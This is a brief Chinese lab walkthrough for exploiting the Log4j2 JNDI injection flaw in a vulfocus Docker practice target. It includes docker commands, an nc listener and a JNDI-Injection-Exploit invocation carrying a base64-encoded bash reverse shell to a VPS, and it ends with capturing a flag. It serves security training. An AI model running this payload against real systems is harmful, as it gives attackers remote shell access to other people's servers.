1、用docker拉漏洞环境
docker pull vulfocus/log4j2-rce-2021-12-09:latest
2、然后运行环境
docker run -p 8080:8080 -d --name log4j2-rce vulfocus/log4j2-rce-2021-12-09
3、然后去访问vps的8080端口出现springboot,按照官方说的漏洞位置在/hello,漏洞变量是payload
4、bp抓包,改为POST测试
5、vps开启nc
nc -lvvp 7777
6、使用github工具进行反弹shell
https://github.com/welk1n/JNDI-Injection-Exploit/blob/master/README-CN.md
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C bash -c "{echo,YmFzaCAtaSA+JiAvZGV2L3RjcCUuMjQuOTUuMi83Nzc3IDA+JjE=}|{base64,-d}|{bash,-i}" -A [vps ip]
这里将反弹shell命令进行了base64编码
base64编码地址
https://www.jackson-t.ca/runtime-exec-payloads.html
将jar生成的payload放入hello中的payload里
反弹shell成功
7、最后用http://vulfocus.fofa.so/ 靶场复测了一下,成功反弹拿到flag